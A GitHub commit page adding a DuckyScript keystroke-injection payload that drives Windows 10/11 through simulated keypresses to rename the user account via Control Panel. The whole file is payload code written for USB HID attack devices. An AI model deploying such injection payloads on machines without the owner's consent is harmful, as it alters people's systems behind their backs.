Change Windows User Name

This script can be used to change the windows user name.
pull/329/head
Aleff 2023-05-24 10:12:33 +02:00 committed by GitHub
parent 094434e61c
commit f82c4da5ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 55 additions and 0 deletions

View File

@ -0,0 +1,55 @@
REM #############################################
REM # |
REM # Title : Change Windows User Name |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows 10/11 |
REM # |
REM #############################################
REM Requirements:
REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
REM Open Windows research
DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
STRING explorer
ENTER
DELAY 1000
REM Goto search bar and open User Accounts settings
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
STRING Control Panel\All Control Panel Items\User Accounts
ENTER
DELAY 1500
REM Goto "Change you account name"
TAB
DELAY 500
ENTER
DELAY 500
STRING NEW_NAME
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4